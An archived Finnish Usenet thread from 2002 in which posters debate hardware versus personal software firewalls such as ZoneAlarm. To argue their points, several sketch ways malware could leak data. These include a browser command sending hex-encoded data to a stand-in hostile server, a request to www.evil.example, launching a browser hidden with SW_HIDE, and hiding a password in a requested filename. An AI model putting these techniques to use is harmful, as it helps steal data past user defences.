80 ja ehkä vielä osaa käyttää sopivaa http prokotollaa. Näitä tietääkseni on
olemassa kasapäin.
Z:n ohittamiseen tarvitaan troijalainen joka käyttää olemassa olevaa
ohjelmaa ja sen siivellä lähettää tietoja (esim. selaimen kautta). Tämä
TÄYTYY kuitenkin tehdä silloin kun käyttäjä ITSE käyttää ko. ohjelmaa ja
saada siltikin vielä tehtyä niin että käyttäjä ei huomaa esim. avautuvaa uutta
ikkunaa jossa on outo URL. Tälläistä softaa ei ole tietääkseni
olemassakaan ainakaan vielä.
Kumpi on helpompi siis ohittaa? Väitän että rautapalomuuri.
> > Millä helevetillä se sen tekee kun ei pääse kirjoittamaan ko. kansioihin
> > (siis jos systeemi on oikein konfiguroitu)?
>
> Windowssissa on ennenkin ollut lokaaleja reikiä, joilla saadaan admin- tai
> system-oikeudet.
Seliseli. Palomuureissakin on ollut reikiä ja oletussalasanoja joita ei ole
otettu pois. Hyvä ylläpito tarkistelee ja paikkailee systeemiä PÄIVITTÄIN.
> Jos haittaohjelma pääsee käynnistymään koneessasi, et tiedä mitä on
> tapahtunut, etkä voi luottaa siihen että mitään ikävää ei tapahdu. Zone
> Alarm (ja vastaavat) voivat parhaimillaan pienentää aiheutuvaa vahinkoa
> joissain tapauksissa, mikä tietysti on positiivista, mutta lopullinen
> ratkaisu kaikkiin ongelmiin ne eivät todellakaan ole.
Eivät lopullinen ratkaisu mutta voin silti tietää aika hyvin mitä koneessa
tapahtuu vaikka suoritankin minkä tahansa tiedoston. Tätä voidaan
boostata sitten muilla ohjelmilla, esim. Trojan Trap, RegistryProt ja
vastaavat.
Ja ZA ja vastaavat voivat minimoida vahingon, yleensä ne kyllä estävät sen
KOKONAAN. Sitä ei rautapalomuuri tee.
Sami Rautiainen
>> Pointtina on se, että jos avaat pääsyn verkkoon mille tahansa ohjelmalle,
>> sitä ohjelmaa voidaan käyttää tiedon vuotamiseen ulospäin. Vähään
>> samaan tapaan, kun jos rautapalomuurissa avataan portti Z, niin
>> haittaohjelma voi liikennöidä portin Z kautta.
> Paino sanalle vähän samaan tapaan. Sillä erolla tosin että rautapalomuurin
> ohittamiseen ulospäin riittää mikä tahansa troijalainen joka käyttää porttia
> 80 ja ehkä vielä osaa käyttää sopivaa http prokotollaa. Näitä tietääkseni on
> olemassa kasapäin.
Riippuu erillisen palomuurin konffauksesta. Sekä rauta- että softapalomuurin
saa konffattua kohtuullisen tiukasti niin, että haittaohjelman toiminta
vaikeutuu. Mutta jos jotain sallitaan, otetaan tietoinen riski. Molemmissa
tapauksissa.
Se sitten lienee makuasia kumpi on isompi riski, HTTP vai "vain" Opera.
> Z:n ohittamiseen tarvitaan troijalainen joka käyttää olemassa olevaa
> ohjelmaa ja sen siivellä lähettää tietoja (esim. selaimen kautta).
Jep, jos oletetaan että Zone Alarm toimii niinkuin pitää. Voidaanko ko.
oletus tehdä, jos tuntematon ohjelma on suoritettu koneessa?
> Tämä TÄYTYY kuitenkin tehdä silloin kun käyttäjä ITSE käyttää ko. ohjelmaa
> ja saada siltikin vielä tehtyä niin että käyttäjä ei huomaa esim.
> avautuvaa uutta ikkunaa jossa on outo URL.
Käyttäjältä ei tarvitse piiloutua. Se on joissain tapauksissa troijalaisen
kannalta etu, mutta ei ehdoton vaatimus.
> Tälläistä softaa ei ole tietääkseni olemassakaan ainakaan vielä.
Mikä ei tarkoita että sellaista ei ole.
> Kumpi on helpompi siis ohittaa? Väitän että rautapalomuuri.
Riippuu siitä miten erillinen palomuuri on konffattu. Esimerkiksi jos se ei
salli kuin liikenteen ennaltamäärättyihin luotettuihin kohteisiin, niin sen
ohittaminen on vähintäänkin epätriviaalia.
>> > Millä helevetillä se sen tekee kun ei pääse kirjoittamaan ko. kansioihin
>> > (siis jos systeemi on oikein konfiguroitu)?
>>
>> Windowssissa on ennenkin ollut lokaaleja reikiä, joilla saadaan admin- tai
>> system-oikeudet.
[..]
> Palomuureissakin on ollut reikiä ja oletussalasanoja joita ei ole
> otettu pois.
Niin on.
> Hyvä ylläpito tarkistelee ja paikkailee systeemiä PÄIVITTÄIN.
Niin tekee.
Kumpikaan ei kuitenkaan sulje sitä tosiasiaa pois, että koneessa
paikallisesti toimiva sovellus on pääsääntöisesti helpompi lamauttaa kuin
erillisessä laitteessa sijaitseva palomuuri.
>> Jos haittaohjelma pääsee käynnistymään koneessasi, et tiedä mitä on
>> tapahtunut, etkä voi luottaa siihen että mitään ikävää ei tapahdu. Zone
>> Alarm (ja vastaavat) voivat parhaimillaan pienentää aiheutuvaa vahinkoa
>> joissain tapauksissa, mikä tietysti on positiivista, mutta lopullinen
>> ratkaisu kaikkiin ongelmiin ne eivät todellakaan ole.
> Eivät lopullinen ratkaisu mutta voin silti tietää aika hyvin mitä koneessa
> tapahtuu vaikka suoritankin minkä tahansa tiedoston.
Joissain tapauksissa, kyllä. Aina, ei.
> Tätä voidaan boostata sitten muilla ohjelmilla, esim. Trojan Trap,
> RegistryProt ja vastaavat.
> Ja ZA ja vastaavat voivat minimoida vahingon, yleensä ne kyllä estävät sen
> KOKONAAN. Sitä ei rautapalomuuri tee.
Jälleen riippuu konffauksesta.
Kumpikaan, sen enempää ZA kuin erillinen palomuurikaan, ei yleensä estä
kaikkia mahdollisuuksia esimerkiksi tietovuotoon ihan käytännön syistä.
IMHO tärkeää onkin tiedostaa *molempien* ratkaisujen hyvät ja huonot puolet,
ja säilyttää realismi siitä mihin valittu tekniikka pystyy ja mihin ei.
Ari Laitinen
> On Sun, 16 Jun 2002 01:20:47 +0300, "Ari Laitinen" <nos...@arisoft.fi>
> wrote:
> > No nyt kun sinulle kävi selväksi että operassa on tietoturva-aukko niin
> > miten nyt suhtaudut siihen asiaan että saako koneessa ajaa
> > tuntemattomia ohjelmia jos on palomuuri vai eikö saa?
>
> Ei tietenkään saa.
No mikä olisi paras menetelmä estää tuntemattomien ohjelmien suorittaminen
tietokoneessa?
KL
> Z:n ohittamiseen tarvitaan troijalainen joka käyttää olemassa olevaa
> ohjelmaa ja sen siivellä lähettää tietoja (esim. selaimen kautta). Tämä
> TÄYTYY kuitenkin tehdä silloin kun käyttäjä ITSE käyttää ko. ohjelmaa ja
> saada siltikin vielä tehtyä niin että käyttäjä ei huomaa esim. avautuvaa
uutta
> ikkunaa jossa on outo URL. Tälläistä softaa ei ole tietääkseni
> olemassakaan ainakaan vielä.
Hetkinen.. joku tovi sitten totesit että kun data on lähtenyt pahiksen
servulle niin peli on päättynyt. Jos nyt troijalainen avaa Exploderin tai
Operan vaikka blank ikkunaan ja poksauttaa tavarat menemään niin millä tapaa
käyttäjä a) huomaa asiaa (muuten kuin kiroilemalla ihmeellistä tyhjää
ikkunaa ja aukomalla selainta uudelleen ja uudelleen) ja b) imaisee ne
salasanasa takaisin sieltä Vanuatulta tai minne ikinä data lähetettiinkin ?
> Seliseli. Palomuureissakin on ollut reikiä ja oletussalasanoja joita ei
ole
> otettu pois. Hyvä ylläpito tarkistelee ja paikkailee systeemiä PÄIVITTÄIN.
Hyvä ylläpito rakentaa systeemin jota ei tarvitse pitää kädestä kiinni 24 /
7.
Miksi täällä on yleensäkin niin vaikeaa päästä esim konsensukseen siitä että
rauta + softapalomuuri yhdistelmällä saadaan aikaan tanakin ja ennenkaikkea
loppukäyttäjälle kivuttomin ratkaisu ? Olen tässä jonkun päivän seurannut
tätä kädenvääntöä joka ei enää vähään aikaan ole mennyt mistään minnekään...
Panu Mantylahti
> Yksi sana: Steganografia.
Miksi ihmeessä tuho-ohjelman pitäisi nähdä noin paljon vaivaa? Juurihan
selitin, miten yksinkertaisella merkkisiirroksella häivytetään
hyötykuorma.
Piiloitettu informaatio vaatii alkuperäistä viestiä huomattavasti
suuremman isännän, käytännössä kuvan tai äänitiedoston. Näitä kyllä
imuroidaan verkosta käsin, mutta harvemmin uppaillaan selaimen avulla.
Ja mitä tulee tuohon uuden ikkunan avaamiseen selaimessa, niin
HTTP-pyynnön ei tarvitse semmoista tehdä. Katso joskus
protokolla-analysaattorilla mitä Oopperasi juttelee verkkoon kun
käynnistät sen. Vihje: proxyasetukset haetaan usein automaattisesti.
Jori Mantysalo
[ Dataa ulos koneesta olettaen, että Opera saa liikennöidä ulos. ]
> Ei varmasti lähetä ilman että Opera ilmoittaa mitään. Muuten se olisi ns.
> tietoturva-aukko.
Ei ole Windows nyt alla, mutta eikö Operaa sitten voi käynnistää tavalliseen
tapaan toisesta ohjelmasta ShellExecute -funktiolla ja antaa sen parametriksi
SW_HIDE? Tuolla tavalla sen pitäisi toimia, jos se noudattaa hyvää
Windows-ohjelmointitapaa.
--
"Syömisen pitää olla FIFO ja pitää varoa ettei siitä tule LIFO."
-- TP, syö-niin-paljon-kuin-jaksat -ravintolassa
Matti Juhani Kurkela
> On Sat, 15 Jun 2002 20:19:43 +0300, "Ari Laitinen" <nos...@arisoft.fi>
> wrote:
> > Softapalomuuri ei voi tunnistaa uhkaa ennenkuin tietokone on
> > vastaanottanut paketin, jossa uhka on.
>
> Ja merkitys on missä? Kun softapalomuuri torjuu sen niin....niin?
Jos uhka perustui käyttöjärjestelmän verkkoajurissa olevaan bugiin,
koneen verkkoajuri (tai koko käyttöjärjestelmä: muista "Ping of
Death") kaatuu ennen kuin softapalomuuri näkee ensimmäistäkään
uhkapakettia.
Rautapalomuuri toimii mm. denial of service-hyökkäyksiä vastaan
sulakkeen tavoin: jos joku keksii uuden tavan rikkoa jotakin
protokollaa siten että se jumiuttaa yleisimmät verkkoajurit,
palomuurilaite jumittuu mutta sen takana oleva kone pysyy pystyssä.
Palomuurilaitteen jumittuminen aiheuttaa sen läpi kulkevien
Internet-yhteyksien katkeamisen, jolloin a) hyökkäystä palomuurin
takana olevaa konetta vastaan ei voi tehdä, ja b) sisäpuolella olevan
koneen käyttäjä huomaa suhteellisen pian että jotakin on vinossa.
Lisäksi hyvä rautapalomuuri pystyy tunnistamaan ainakin
yksinkertaisemmat SYN-floodit tai vastaavat denial of
service-hyökkäykset ja varmistamaan että työskentely sisäverkossa voi
jatkua häiriytymättä. Internet-yhteys tietenkin hidastuu, mutta
tällaisen denial of service-hyökkäyksen täydellinen neutralointi
onnistuukin ainoastaan ISP:n päästä.
hannu varho
samalla tuli paljon muitakin mielipiteitä.news:slrnaginn2...@maa1.cc.lut.fi...
> In article <1104_10...@news.utu.fi>, Markus Jansson wrote:
> > On 13 Jun 2002 21:23:24 GMT, slu...@maa1.cc.lut.fi (Sauli Luoto) wrote:
> >> Toisaalta voidaan myöskin sanoa, että mikään tunnettu haittaohjelma ei
> >> pääse myöskään ulkoisesta palomuurista läpi. Tunnettu ohjelmahan on
> >> sellainen, jonka käyttäytyminen tiedetään. Ja kun käyttäytyminen
> >> tiedetään, niin se voidaan säännöillä estää.
> > Ei voida. Kerro millä säännöllä estät yrityksen palomuurista käsin, että
> > jonkun työntekijän tietokoneelta haittaohjelma, joka käyttää portti 80
ulos, ei
> > pääse lavertelemaan löytöjään toiselle puolen maapalloa? ET MITENKÄÄN.
>
> iptables -A INET-ULOS -d spy.ware.palvelin.microsoft.com -j DROP
>
> Tuolla estetään kaikki liikenne palvelimelle, voitaisiin toki määritellä
> tarkemminkin, jos vaikka olisi jotain muuta asiaa tuonne. Tavallisesti
> tuskin on mitään aisaa kuitenkaan palvelimelle, joka kerää spy-warea tms.
>
> Jospa otat hieman selvää asioista ennenkuin kerrot mitä oikeilla
> palomuureilla voidaan tehdä ja mitä ei voida tehdä.
>
>
> > Seliseli. Jos haittaohjelma voidaan huomata niin sitten se voidaan
> > samantien poistaa eikä palomuurausta edes tarvita koettamaan rajoittaa
> > sen toimintaa.
>
> Se voidaan poistaa, jos se sattuu olemaan yksittäinen ohjelma, mutta entäs
> se kaikki Windows-ohjelmiin sisäänrakennettu paska. Ja toisaalta, jos se
> tiedosto on kerran päässyt koneelle, niin miksi se ei voisi päästä toista
> kertaa sinne?
>
>
> > Pointtini nimenomaan on, että haittaohjelma voidaan konfiguroida
ottamaan
> > yhteys tietyyn hakkerin osoittamaan IP-osoitteeseen asennusvaiheessa
(eli
> > laittaa asetukset valmiiksi pakettiin joka sitten saatetaan
kohdekoneeseen
> > asentumaan käyttäen typeriä käyttäjiä, tietoturva-aukkoja tai röyhkeätä
> > tunkeutumista suoraan fyysisesti tietokoneelle. Sitten se lähettelee
portin
> > 80 kautta vaikka kirjoitettuja salasanoja ja vastaavia sinne hakkerille.
>
> Jos nyt puhutaan tuosta äsken mainitsemastasi kuvittellisesta yrityksestä,
> niin kerroppa missä yrityksessä tehdään hommat niin päin persettä että
> käyttäjä voi asentaa itse ohjelmia koneelle, ja vieläpä testaamattomia
> ohjelmia. Ja missä tallennetaan mitään muita salasanoja koneella kuin
> iltalehden www-version tunnukset.
>
> Noh, enivei, kuten jo kerroin ja osoitin palomuurin voi konfiguroida niin,
> että estetään johonkin tiettyy ip:hen lähtevät yhteydet. Firmoissa lienee
> melko yleistä, että palomuurin yhteydessä on myös läpinäkyvä
> proxy-palvelin, jonka läpi liikenne pakotetaan.
>
>
> >> On totta, että kuka tahansa voi perustaa millaisen palvelimen tahansa,
> >> mutta niistä palvelimista on hyötyä vasta siinä vaiheessa, kun ihmisten
> >> tietokoneille saadaan ujutettua asiakas-ohjelmia, joka lähettää
> >> palvelimelle tietoja. Ja kun on olemassa asiakasohjelma niin nähdään
oitis
> >> mihin ja miten se kommunikoi, ja se voidaan estää.
> > Eikä nähdä oitis. Millä näet sen? Virustentorjuntaohjelmalla? Arvaa
> > uudestaan, eivät löydä useimpia uudehkoja ohjelmia, esim.
> > www.astalavista.com löytyy kasapäin softaa jota mikään
> > virustentorjuntaohjelma ei löydä.
>
> Jopa rakkaassa Windowsissasi taitaa olla käsky netstat, se kertoo mistä
> portista ja mihin porttiin/ip:hen ollaan yhteydessä ja missä tilassa
> protokolla on. Hienostuneempiakin tapoja analysoida ohjelman tuottamaa
> liikennettä toki on, mutta tuokin kertoo kaiken tarvittavan sen
> estämiseen.
>
>
> > Kun et huomaa etkä tiedä että koneessa on haittaohjelma niin et voi
jäljittää
> > sitä ja sen käyttämää IP:tä mitenkään. Jos taas löydät haittaohjelman
niin
> > sitten taas mitään palomuurausta tms. edes tarvittaisi koska tietysti
> > poistaisit ko. ohjelman koneeltasi.
> >
> > SEN SIJAAN...jos koneessa olisi loistava henkilökohtainen palomuuri,
kuten
> > vaikkapa ZoneAlarm, se hälyttäisi heti että outo ohjelma pyrkii nettiin
(eikä
> > päästäisi ilman erillistä lupaa sitä menemään). Oikein asennettuna
tavallinen
> > käyttäjä ei voisi päästää MITÄÄN ohjelmaa nettiin, ainoastaan ylläpitäjä
joka
> > on etukäteen antanut internet selaimelle oikeuden mennä nettiin. Sitten
kun
> > tämä haittaohjelma antaisi hälytyksen palomuuriin, ylläpitäjä
singahtaisi
> > paikalle, hakisi ko. nimisen tiedoston ja poistaisi sen hevon kuuseen.
> > Homma ratkaistu eikä pelkoakaan tietomurrosta. VOILA!
> >
> > Ja ennen kuin sanot, esimerkiksi minulla on sellainen kokoonpano että
> > ZoneAlarm Pro:n asetuksia EI VOI muuttaa eikä sitä sulkea mitenkään jos
> > en ole 1) pääkäyttäjän tunnuksilla kirjautunut 2) kirjoita vielä
erillistä ZAP
> > salasanaa. Jos turmelet itse ohjelman, se lukitsee nettiyhteyden joten
> > mikään ei pääse nettiin (pl. ohjelmat joilla sinne oli jo aiemmin
pääsy).
> > Tavallinen tahvo käyttäjä ei edes voisi aikaansaada mitään mikä voisi
> > aiheuttaa haittaohjelmia pääsemästä nettiin tällä koneella vaikka
suorittaisi
> > mitä ohjelmia!!!
>
> Koska palomuurin tehtävä ei ole tarkkailla ajettavia ohjelmia tuo on
> mielestäni hyödytöntä, samaten ylläpitäjän juoksuttaminen. Jos haluan
> todellista suojaa koneeni menee nettiin proxy/firewall yhdistelmän läpi,
> joka ei sijaitse samalla koneella. Tuolla saavutetaan se suoja, mitä sinä
> luulet saavuttavasi ZAP:illa. Ja tuo tarkoittamani firewall on osa
> kerneliä, eikä jokin kernelin ulkopuolinen ohjelma, joka voidaan
loppupeleissä
> ohittaa/sammuttaa.
>
> Kyllä, se ZAP voidaan todellakin sammuttaa, johtuen siitä että se on vain
> yksi prosessi. Siinä voi olla joitakin lukituksia, suojauksia taikka mitä
> tahansa, mutta se ei muuta sitä faktaa että se on prosessi jota ydin pitää
> käynnissä, ja jonka se voi myös sammuttaa. Eikä tarvitse edes salasanaa.
Juha Sahakangas
> Lue nyt hyvä mies mitä kirjoitan.
> 1) Jos ZA on laitettu kysymään lupa (kuten pitäisi olla!) niin tuollaisen batin
> suorittaminen aikaansaa kysymyksen vaikkapa kesken tekstinkäsittelyn että
> haluatkos päästää Operan ulos? Epäilykset heräävät heti koska en ole itse
> käynnistämässä Operaa.
Ehkä pitäisi olla. Mutta ei ole. _KUKAAN_ ei jaksa rämpyttää sitä
permittiä joka kerta kun selaimella pitäisi ottaa yhteys johonkin
suuntaan, muutama miljuuna kertaa päivässä kypsyttää kyllä varmaan sen
turvallisuusfriikin, peruskäyttäjästä puhumattakaan, ruksimaan sen
remember-checkboxin lempiselaimensa kohdalta, ja sitten ollaankin siinä
tilanteessa, että sitä voi ajaa, ja sen kautta lähettää tai vastaanottaa
ihan mitä vaan.
> 2) JOS se saadaan jotenkin linkitettyä siihen että kun käyttäjä on itse
> Operalla liikenteessä niin sitten se salakavalasti aukaisee piiloikkunan
> (mitenkähän se senkin tekisi?) ja lähettää tietoja, sitä ei voidakaan
Jos nyt oletetaan että käyttäjä on oikeasti sellainen masokisti, että
kiduttaa itseään sillä permitin naksuttelulla, niin ei ole homma eikä
mikään seurata prosessilistaa ja tehdä temppunsa vasta silloin kun
huomaa että nyt se selain on käynnistetty, ja käyttäjä melko varmasti
surffaa netissä. Lisävarmistukseksi voi katsella vielä vaikka avoimien
porttien listaa, jos on yhteyksiä auki johonkinpäin maailmaa porttiin
80 samalla kun se opera tai ie on auki, niin eiköhän siellä joku
surffaa wepissä, reitti selvä.
Ja batilla ei ehkä voi piiloikkunaa avata, mutta ei siihen kummoista
softanpätkää tarvita.
> estää...mutta miten lähetät käyttäjän huomaamatta esim. Operan kautta
> tietoja nettiin? Tiedostojen lähettäminen suoraan ei onnistu koska Opera
> kysyy varmistuksen että haluaako käyttäjä siirtää tiedoston X palvelimelle.
Vaikkapa sen salasanan lähettämiseen nyt ei mitään tiedostoa tarvitse
lähettää, tai välttämättä yhtään mitään, joka erikseen varmistetaan,
voihan sen toteuttaa vaikka kysymällä sieltä palvelimelta tiettyä
tiedostoa (joka nyt vain sattuu olemaan samanniminen kuin se salasana),
ja yllättäen se jää logiin, mistä sitten voikin kätevästi seuloa
> Summa summarum: on naurettavaa väittää rautapalomuuria jotenkin
> "oikeaksi" ja "parhaaksi" ja "luotettavaksi" palomuuriksi. Siitä pääsee vielä
Saattaa hyvinkin olla. Mutta ainakin yhtä naurettavaa on väittää
softapalomuureja pomminvarmoiksi sen suhteen ettei niistä muka pääsisi
millään ulospäin.
Juha Sahakangas
> Jos uusi ikkuna avautuu, käyttäjä huomaa sen.
Paitsi jos se on piiloikkuna. Seuraava?
Ari Saastamoinen
> Etkö osaa lukea vai onko ymmärryksessäsi jotakin vikaa?
> Montako kertaa minun pitää sanoa: ET VOI KARSIA NIITÄ POIS MILLÄÄN
> RAUTAPALOMUURILLA KOSKA RAUTAPALOMUURI EI VOI MUUTA
> KUIN TARKKAILLA MIHIN OSOITTEESEEN JA PORTTIIN PAKETTIX
> MENEE!
Sinänsä toi rautapalomuuri on huono sana, kun ohjelmallisesti nekin on
toteutettu, mutta miksi erillisen palomuurin täytyisi tyytyä pelkästää
L3-tason pakettien suodatukseen, kun se voisi aivan hyvin vaatia
käyttäjän ohjelmilta jonkinnäköistä authentikointia? Tiedän
muutamankin firman, jonka verkosta ei pääse ulos millään
protokollalla, yhtään mihinkään porttiin tai osoitteeseen ilman, että
käyttäjän tarvii erikseen autentikoida kyseinen yhteys, eikä
kyseisissä firmoissa ole konekohtaisia palomuuriohjelmia käytössä.
--
Arzka oh3mqu+...@vip.fi - En halua follareita mailina
1. Valitse sopiva paikka, ei ihmisten tai rakennusten lahella, jossa
paukku voi aiheuttaa hairiota. - Iso-Kiinalaisen kayttoohje
Ari Saastamoinen
> HTTP-protokollan mukaisella pyynnöllä koneelta www.evil.example
> sivua "foobar1234". Tällöin merkkijono "foobar1234" siirtyy ilkeälle
> kräkkerille. Rautapalomuuri voi yrittää estää tätä kieltämällä yhteydet
Ei siirry, ellei se evil-ohjelma osaa myös antaa tuon proxyn vaatimaa
salasanaa.
Ari Saastamoinen
> Totta, totta. Kuitenkin, voidaan sanoa perustellusti että tällä
> hetkellä mikään tunnettu haittaohjelma ei siitä pääse läpi jos se on
> oikein konfiguroitu.
Mitä tarjoat mulle, jos teen ohjelman, joka tuosta pääsee läpi.
Vaikka en edes tiedä, miten se sun ohjelmasi toimii, niin uskoisin sen
pystyväni halutessani kiertämään.
> Mutta mistä tiedä mikä palvelin on hakkerin palvelin? Et voi tietää mistään.
Ei sitä firewallia noin konffatakaan, vaan ihan oikeissa firmoissa ei
surffata _millään_ yrityksen ulkopuolisella webbisivulla ilman
autentikointia.
Markus Jansson
<Matti....@hut.fi> wrote:
> Eikö? Mikä estää haittaohjelmaa ajamasta vaikkapa komentoa
> "iexplore.exe http://pieni.ilkeä.palvelin/
(vuodettava_data_heksamössönä)"?
> Jos tämä ei onnistu ja selain on jo käynnissä, haittaohjelma voi lähettää
> jo nettiluvan saaneelle selaimelle Windowsin DDE:llä samantyylisen
> openURL()-käskyn. Estääkö softapalomuurisi nämä? Onko sillä
> yleensäkään mitään varmaa keinoa varmistaa että Internet-yhteyttä
> luvallisesti käyttävän ohjelman ohjaimissa on juuri käyttäjä eikä
> toinen ohjelma?
ZA voidaan vaatia kysymään käyttäjältä lupa kun ohjelma koettaa nettiin.
Tietysti jos haittaohjelma odottaa kunnes käyttäjä itse menee nettiin ja
sitten ajaa tuon niin. En ole muuten varma kysyisikö siltikin, koska ZA laskee
selaimet prosesseina ja uusi prosessi alkaa niin...noniin.
> Eräässä mielessä henkilökohtainen palomuuri on tappion tunnustus:
> "En pysty varmistamaan että koneessa ei päästä käynnistämään
> haittaohjelmia, siispä asetan yhden ohjelman vahtimaan toisia ja
> toivon etteivät haittaohjelmat ole vahtiohjelmaa ovelampia."
> Tämä malli romahtaa jos satut saamaan koneeseesi haittaohjelman joka
> on uudempi ja ovelampi kuin palomuuriohjelmasi.
AIVAN SAMAA VOI SANOA RAUTAPALOMUURISTAKIN!!!
Markus Jansson
> > > No nyt kun sinulle kävi selväksi että operassa on tietoturva-aukko niin
> > > miten nyt suhtaudut siihen asiaan että saako koneessa ajaa
> > > tuntemattomia ohjelmia jos on palomuuri vai eikö saa?
> >
> > Ei tietenkään saa.
>
> No mikä olisi paras menetelmä estää tuntemattomien ohjelmien
> suorittaminen tietokoneessa?
Rautapalomuuri? Hetkonen...ei...joten...
Markus Jansson
<keijo.no.sp...@welho.com> wrote:
> Hetkinen.. joku tovi sitten totesit että kun data on lähtenyt pahiksen
> servulle niin peli on päättynyt. Jos nyt troijalainen avaa Exploderin tai
> Operan vaikka blank ikkunaan ja poksauttaa tavarat menemään niin millä
> tapaa käyttäjä a) huomaa asiaa (muuten kuin kiroilemalla ihmeellistä
> tyhjää ikkunaa ja aukomalla selainta uudelleen ja uudelleen) ja b) imaisee
> ne salasanasa takaisin sieltä Vanuatulta tai minne ikinä data lähetettiinkin
> ?
ZA voidaan laittaa kysymään lupa käyttäjältä että saako selaimen päästää
nettiin.
> Miksi täällä on yleensäkin niin vaikeaa päästä esim konsensukseen siitä
> että rauta + softapalomuuri yhdistelmällä saadaan aikaan tanakin ja
> ennenkaikkea loppukäyttäjälle kivuttomin ratkaisu ? Olen tässä jonkun
> päivän seurannut tätä kädenvääntöä joka ei enää vähään aikaan ole
> mennyt mistään minnekään...
Olen täysin samaa mieltä. Eräät "gurut" vain täällä vaahtoavat miten
softapalomuurista ei ole muka mihinkään ja että "ainoa oikea ja kaunis ja
turvallinen" vaihtoehto on muka rautapalomuuri. Se on täyttä hevonpaskaa.
Markus Jansson
> > Z:n ohittamiseen tarvitaan troijalainen joka käyttää olemassa olevaa
> > ohjelmaa ja sen siivellä lähettää tietoja (esim. selaimen kautta).
>
> Jep, jos oletetaan että Zone Alarm toimii niinkuin pitää. Voidaanko ko.
> oletus tehdä, jos tuntematon ohjelma on suoritettu koneessa?
Jos tietokone on muuten järkevästi konfiguroitu niin kyllä voidaan. Ainakin
kunnes toisin on osoitettu.
> > Kumpi on helpompi siis ohittaa? Väitän että rautapalomuuri.
>
> Riippuu siitä miten erillinen palomuuri on konffattu. Esimerkiksi jos se ei
> salli kuin liikenteen ennaltamäärättyihin luotettuihin kohteisiin, niin sen
> ohittaminen on vähintäänkin epätriviaalia.
ZA voidaan myös määritellä olemaan päästämättä liikennettä missään
tilanteissa muihin kuin ennalta määrättyihin IP-osoitteisiin jolloin nuo kikkailut
selaimen jne. kanssa eivät toimi. Joten???
> Kumpikaan ei kuitenkaan sulje sitä tosiasiaa pois, että koneessa
> paikallisesti toimiva sovellus on pääsääntöisesti helpompi lamauttaa kuin
> erillisessä laitteessa sijaitseva palomuuri.
Totta. Teoriassa ainakin. Käytännössä...
Markus Jansson
> > Totta, totta. Kuitenkin, voidaan sanoa perustellusti että tällä
> > hetkellä mikään tunnettu haittaohjelma ei siitä pääse läpi jos se on
> > oikein konfiguroitu.
>
> Mitä tarjoat mulle, jos teen ohjelman, joka tuosta pääsee läpi.
> Vaikka en edes tiedä, miten se sun ohjelmasi toimii, niin uskoisin sen
> pystyväni halutessani kiertämään.
Mainetta ja kunniaa? Tee samalla ohjelma joka menee rautapalomuurista
läpi.
Sami Rautiainen
>> > Z:n ohittamiseen tarvitaan troijalainen joka käyttää olemassa olevaa
>> > ohjelmaa ja sen siivellä lähettää tietoja (esim. selaimen kautta).
>>
>> Jep, jos oletetaan että Zone Alarm toimii niinkuin pitää. Voidaanko ko.
>> oletus tehdä, jos tuntematon ohjelma on suoritettu koneessa?
> Jos tietokone on muuten järkevästi konfiguroitu niin kyllä voidaan. Ainakin
> kunnes toisin on osoitettu.
Nimenomaan toisin päin. Pitää pystyä todistamaan että vahinkoa ei
tapahtunut, muutoin ei voi olla varma.
>
>> > Kumpi on helpompi siis ohittaa? Väitän että rautapalomuuri.
>>
>> Riippuu siitä miten erillinen palomuuri on konffattu. Esimerkiksi jos se ei
>> salli kuin liikenteen ennaltamäärättyihin luotettuihin kohteisiin, niin sen
>> ohittaminen on vähintäänkin epätriviaalia.
> ZA voidaan myös määritellä olemaan päästämättä liikennettä missään
> tilanteissa muihin kuin ennalta määrättyihin IP-osoitteisiin jolloin nuo kikkailut
> selaimen jne. kanssa eivät toimi. Joten???
Joten olet saanut aikaiseksi konffauksen joka on helpompi (ainakin yli yhden
koneen verkossa) tehdä erillisessä palomuurissa.
>
>> Kumpikaan ei kuitenkaan sulje sitä tosiasiaa pois, että koneessa
>> paikallisesti toimiva sovellus on pääsääntöisesti helpompi lamauttaa kuin
>> erillisessä laitteessa sijaitseva palomuuri.
> Totta. Teoriassa ainakin. Käytännössä...
>
Ja käytännössä ajattelit lamauttaa eri koneessa olevan palomuurin miten?
Ari Laitinen
> wrote:
> > > > No nyt kun sinulle kävi selväksi että operassa on tietoturva-aukko
niin
> > > > miten nyt suhtaudut siihen asiaan että saako koneessa ajaa
> > > > tuntemattomia ohjelmia jos on palomuuri vai eikö saa?
> > >
> > > Ei tietenkään saa.
> >
> > No mikä olisi paras menetelmä estää tuntemattomien ohjelmien
> > suorittaminen tietokoneessa?
>
> Rautapalomuuri? Hetkonen...ei...joten...
Softapalomuuri? Hetkonen... ei.... joten...
Kumpikaan menetelmä ei sovellu pääasialliseksi tietoturvamenetelmäksi
vihamielistä ohjelmakoodia vastaan. Siksi keskustelu aiheesta on melko
hyödytöntä koska asialle on tosiaan tehtävä jotain ihan muuta kuin
säädettävä palomuuri sellaiseksi ettei nettiä voi enää käyttää normaalisti.
Ari Laitinen
> On 16 Jun 2002 20:54:25 GMT, Sami Rautiainen
> <rtia...@suespammers.org> wrote:
> > > Z:n ohittamiseen tarvitaan troijalainen joka käyttää olemassa olevaa
> > > ohjelmaa ja sen siivellä lähettää tietoja (esim. selaimen kautta).
> >
> > Jep, jos oletetaan että Zone Alarm toimii niinkuin pitää. Voidaanko ko.
> > oletus tehdä, jos tuntematon ohjelma on suoritettu koneessa?
>
> Jos tietokone on muuten järkevästi konfiguroitu niin kyllä voidaan.
Ainakin
> kunnes toisin on osoitettu.
Pitäisi voida osoittaa ettei voi osoittaa toisin.
Rahani ovat turvassa tyynyn alla kunnes on toisin todistettu!